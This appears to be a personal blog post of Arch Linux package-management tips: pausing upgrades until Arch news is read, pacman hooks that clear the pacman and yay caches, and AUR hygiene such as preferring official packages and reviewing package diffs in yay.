The Arch Linux package management is great. But there are some things I had to change to fit my workflow. There are listed here.

Force yourself to read Arch news before upgrading

Arch Linux will sometimes upload package updates that will break your systems. On the top of my head, I can think of a grub update breaking my system in 2022, or linux-firmware in 2025.
While these breakages are rare, they can happen, and Arch Linux expects you to read the Arch News and be aware of them.

You can use the informant package to prevent this, that provides a pacman hook cancelling package upgrades when a new Arch news has been published.
After installing it, add yourself to the group using sudo usermod -aG informant $USER, and informant will check for new Arch news whenever you run an upgrade, and warn you.

Automatically clear the package cache

By default, pacman and yay keep all (or a lot ?) of old package files you have installed.

pacman

pacman stores a package cache in /var/cache/pacman/pkg/. It can be cleared using paccache -r -k0. To execute that command automatically, we can use the following pacman hook:
/etc/pacman.d/hooks/autoclean-pacman.hook

[Trigger]
Operation = Upgrade
Operation = Install
Type = Package
Target = *

[Action]
Description = Keep nothing in pacman cache
When = PostTransaction
Exec = /usr/bin/paccache -r -k0

If you want to keep the last N package versions built, you can change -k0 to -kN.

yay

yay will store AUR package cache in a user directory, ~/.cache/yay/. Clearing it automatically is more difficult, as yay does not support hooks, and pacman hooks will execute as root (and so ~ will not point to the right directory).

Thankfully, since yay executes pacman with sudo, we can use the variable SUDO_USER to get back to our original user.
Here is what the corresponding hook looks like:
/etc/pacman.d/hooks/autoclean-yay.hook

[Trigger]
Operation = Upgrade
Operation = Install
Type = Package
Target = *

[Action]
Description = Keep nothing in yay AUR cache
When = PostTransaction
Exec = /usr/bin/sh -c 'su $SUDO_USER -c "yay -Sc --aur --noconfirm"'

AUR hygiene

As you probably already know, AUR packages are maintained by users. This means that anyone could create/update a package with malicious content, that you would then run on your computer (potentially as soon as you install it, thanks to package installation hooks !)

There are steps you can take to limit this:

Limit your usage of the AUR

You should only install AUR packages when no other sources is available. Prefer official Arch packages when available.
Alternatively, look for official AppImages, Flatpak, or AUR packages officially maintained by the software author.

The key here is that you should limit the number of people you trust. And since you plan to install a software from an editor, you already trust them (to not give you malicious code). Also using them as a source for software packages reduces the number of people you have to trust.

You should also periodically review the AUR packages you use with pacman -Qm

Review changes to AUR packages

when installing an AUR package, yay will automatically prompt you to review changes. To make sure you always check changes, you can configure yay to automatically show them:
~/.config/yay/config.json

{
  "answerdiff": "a"
}

A good AUR package (scripts that live inside the AUR repository excluded) should only lightly change most of the time, updating version and checksums, making it easy for you to review them, and see if any suspicious changes were introduced.

Pro-tip: I also add "answerclean": "n" to skip the second prompt.

Force yourself to read Arch news before upgrading¶

Automatically clear the package cache¶

pacman¶

yay¶

AUR hygiene¶

Limit your usage of the AUR¶

Review changes to AUR packages¶